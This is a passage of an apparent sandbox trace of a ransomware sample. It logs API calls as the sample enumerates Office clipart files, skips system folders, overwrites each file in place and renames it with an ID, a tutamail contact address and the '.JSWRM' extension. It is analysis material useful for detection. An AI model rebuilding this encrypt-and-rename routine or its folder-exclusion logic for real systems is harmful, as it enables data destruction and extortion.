Size=0x30) returned 0x22d0a0 [0074.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0074.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0074.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0074.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0074.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0074.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.017] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0074.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.018] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x728, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01084_.WMF", cAlternateFileName="")) returned 1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2=".") returned 1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="..") returned 1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="...") returned 1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="windows") returned -1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="recovery") returned -1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="perflogs") returned -1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="documents and settings") returned -1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="system volume information") returned -1 [0074.018] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="msocache") returned -1 [0074.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01084_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01084_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01084_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01084_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01084_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01084_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.019] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1832) returned 1 [0074.019] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x720) returned 0x23fc98 [0074.019] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x720, lpOverlapped=0x0) returned 1 [0074.020] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.020] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x720, lpOverlapped=0x0) returned 1 [0074.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.020] CloseHandle (hObject=0x460) returned 1 [0074.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0074.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0074.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0074.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0074.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0074.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.021] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0074.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.022] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66dc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01173_.WMF", cAlternateFileName="")) returned 1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2=".") returned 1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="..") returned 1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="...") returned 1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="windows") returned -1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="recovery") returned -1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="perflogs") returned -1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="documents and settings") returned -1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="system volume information") returned -1 [0074.022] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="msocache") returned -1 [0074.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0074.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01173_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01173_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01173_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0074.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0074.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01173_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01173_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01173_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0074.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.024] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26332) returned 1 [0074.024] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x66d0) returned 0x24c1d0 [0074.024] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x66d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x66d0, lpOverlapped=0x0) returned 1 [0074.069] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.069] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x66d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x66d0, lpOverlapped=0x0) returned 1 [0074.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.069] CloseHandle (hObject=0x460) returned 1 [0074.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0074.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0074.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0074.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0074.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0074.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.070] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0074.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.071] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cd2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01174_.WMF", cAlternateFileName="")) returned 1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2=".") returned 1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="..") returned 1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="...") returned 1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="windows") returned -1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="recovery") returned -1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="perflogs") returned -1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="documents and settings") returned -1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="system volume information") returned -1 [0074.071] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="msocache") returned -1 [0074.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0074.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01174_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01174_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01174_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0074.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0074.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01174_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01174_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01174_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0074.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.072] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27858) returned 1 [0074.072] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6cd0) returned 0x24c1d0 [0074.072] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6cd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x6cd0, lpOverlapped=0x0) returned 1 [0074.075] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.075] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6cd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x6cd0, lpOverlapped=0x0) returned 1 [0074.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.075] CloseHandle (hObject=0x460) returned 1 [0074.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0074.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0074.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0074.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0074.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0074.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.076] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0074.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.076] FindNextFileW (in: 